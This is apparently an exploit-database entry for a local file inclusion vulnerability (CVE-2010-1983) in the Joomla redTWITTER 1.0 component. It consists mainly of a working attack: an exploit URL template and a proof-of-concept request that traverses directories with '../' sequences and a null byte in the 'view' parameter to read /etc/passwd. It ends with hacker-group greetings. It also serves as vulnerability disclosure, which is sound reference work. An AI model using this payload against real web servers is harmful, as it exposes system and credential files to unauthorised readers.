Joomla! Component redTWITTER 1.0 - Local File Inclusion
Author: NoGe
type: webapps
platform: php
port:
date_added: 2010-04-03
date_updated: 2016-12-20
verified: 1
codes: OSVDB-63533;CVE-2010-1983
tags:
aliases:
screenshot_url:
application_url:
=========================================================================================================================
[o] Joomla Component redTWITTER Local File Inclusion Vulnerability
Software : com_redtwitter version 1.0.x
Vendor : http://redcomponent.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
=========================================================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_redtwitter&view=[LFI]
[o] PoC
http://localhost/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
=========================================================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella pizzyroot
H312Y yooogy mousekill }^-^{ noname matthews s4va stardustmemory
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
=========================================================================================================================